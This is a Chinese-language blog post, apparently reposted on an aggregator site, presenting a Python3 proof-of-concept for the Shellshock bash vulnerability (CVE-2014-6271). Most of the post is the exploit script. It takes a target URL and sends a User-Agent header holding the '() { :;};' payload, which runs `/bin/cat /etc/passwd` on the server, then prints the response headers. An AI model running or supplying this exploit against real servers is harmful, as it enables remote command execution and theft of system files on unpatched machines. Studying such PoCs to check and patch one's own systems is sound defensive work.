Python3实现PoC——CVE-2014-6271
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Python3实现PoC——CVE-2014-6271相关的知识,希望对你有一定的参考价值。
一、演示一下CVE-2014-6271的利用效果
二、代码+注释
import requests
import argparse
# 获取参数
parser = argparse.ArgumentParser()
parser.add_argument(‘-u‘, dest="url")
args = parser.parse_args()
url = args.url
# 设置headers,进行验证
headers = {‘user-agent‘: ‘() { :;}; echo `/bin/cat /etc/passwd`‘}
try:
r = requests.get(url, headers=headers)
if(r.status_code == requests.codes.ok):
dict_r = r.headers.items()
for key, value in dict_r:
print("{}: {}".format(key, value))
except Exception as e:
print(str(e))本文出自 “李春光的技术博客” 博客,请务必保留此出处http://lichunguang.blog.51cto.com/10274243/1883749
以上是关于Python3实现PoC——CVE-2014-6271的主要内容,如果未能解决你的问题,请参考以下文章
基于Python3的漏洞检测工具 ( Python3 插件式框架 )
一起架构-某实时分析项目云原生 serverless 架构的设计思路和poc代码实现